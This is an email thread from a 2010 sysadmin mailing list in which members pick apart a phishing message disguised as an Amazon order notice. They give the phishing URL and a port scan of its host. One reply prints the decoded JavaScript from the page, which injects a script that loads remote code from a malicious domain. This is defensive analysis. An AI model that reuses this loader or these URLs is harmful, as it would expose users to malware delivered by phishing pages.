Congrats EZ! Jon
On Tue, Feb 23, 2010 at 12:19 PM, James Rankin <[email protected]>wrote: > I was just alluding to the fact that my LinkedIn updates told me this > morning that EZ had just done the CISSP exam. > > I am sure a lot of people on this list, CISSPs or not, can identify the > intentions and tactics of the spammers and phishers from their attacks > > :-) > > On 23 February 2010 17:17, Clark, Tommy R <[email protected]> wrote: > >> If he were fresh from a CISSP exam, he would have decoded the payload in >> walford.html as the following JavaScript. >> >> >> >> function ljs(){try{var >> s=document.createElement("script");s.setAttribute("src"," >> http://saeghiebeesiogoh.in:3129/js >> ");document.body.appendChild(s)}catch(e){}}setTimeout("ljs()",500); >> >> >> >> Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/jsto >> see what the true intentions were. >> >> >> >> *From:* [email protected] [mailto: >> [email protected]] *On Behalf Of *James >> Rankin >> *Sent:* Tuesday, February 23, 2010 11:45 AM >> >> *To:* NT System Admin Issues >> *Subject:* Re: Order Notify #401186 >> >> >> >> Now there's a guy who's obviously just fresh from a CISSP exam :-) >> >> On 23 February 2010 16:36, Ziots, Edward <[email protected]> wrote: >> >> http://80.109.240.71/~e.loesberg/walford.html >> >> >> >> Is the link inside the email. It’s defintely a phishing attack. Single box >> system behind a firewall (2 hops from source) >> >> >> >> Name: members.chello.nl >> >> Address: 80.109.240.71 >> >> (its in Vienna Austria) >> >> >> >> PORT STATE SERVICE REASON VERSION >> >> 21/tcp open ftp syn-ack ProFTPD 1.2.10 >> >> 80/tcp open http syn-ack Apache httpd >> >> >> >> Like they say, never click the link. And don’t answer the email, it lets >> them know you are there.. and they will just keep spamming you… >> >> >> >> Z >> >> >> >> *From:* Sherry Abercrombie [mailto:[email protected]] >> *Sent:* Tuesday, February 23, 2010 10:37 AM >> >> >> *To:* NT System Admin Issues >> >> *Subject:* Re: Order Notify #401186 >> >> >> >> GMail is good. Marked this one as spam and sent to my spam folder, with a >> nice little warning that it might not be from who it says and to be careful, >> etc etc. >> >> On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <[email protected]> >> wrote: >> >> Oooohhh....I must click on the link, seeing as though it has some funky >> numbers instead of letters. Looks decidedly unsuspicious >> >> On 23 February 2010 15:29, Carol Fee <[email protected]> wrote: >> >> What the hec k ?????? >> >> >> >> *CFee* >> >> *From:* Customer Support [mailto:[email protected]] >> *Sent:* Monday, February 22, 2010 6:55 PM >> *To:* NT System Admin Issues >> *Subject:* Order Notify #401186 >> >> >> >> >> Your Order id:822324764225 >> Info <http://80.109.240.71/~e.loesberg/walford.html> >> >> Thank you. >> Amazon.com Support >> >> >> >> >> >> >> >> >> >> >> >> >> -- >> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into >> the machine wrong figures, will the right answers come out?' I am not able >> rightly to apprehend the kind of confusion of ideas that could provoke such >> a question." >> >> >> >> >> >> >> >> >> -- >> Sherry Abercrombie >> >> "Any sufficiently advanced technology is indistinguishable from magic." >> Arthur C. Clarke >> >> >> >> >> >> >> >> >> >> >> >> >> -- >> "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into >> the machine wrong figures, will the right answers come out?' I am not able >> rightly to apprehend the kind of confusion of ideas that could provoke such >> a question." >> >> >> >> >> >> >> >> >> >> > > > -- > "On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into > the machine wrong figures, will the right answers come out?' I am not able > rightly to apprehend the kind of confusion of ideas that could provoke such > a question." > > > > > > ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/> ~
